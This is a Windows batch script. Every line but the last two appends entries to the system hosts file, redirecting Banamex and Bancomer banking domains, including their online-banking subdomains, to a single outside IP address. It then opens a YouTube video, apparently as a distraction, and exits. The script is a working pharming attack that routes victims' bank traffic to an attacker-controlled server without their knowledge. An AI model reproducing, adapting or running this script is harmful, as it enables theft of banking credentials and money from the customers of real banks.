@echo off
echo 200.58.121.248  banamex.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.banamex.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.bancanetempresarial.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.boveda.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.bancomer.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  bancomer.com >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.personas.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.empresas.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 200.58.121.248  www.negocios.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
start http://www.youtube.com/watch?v=257zsaLjmCE
exit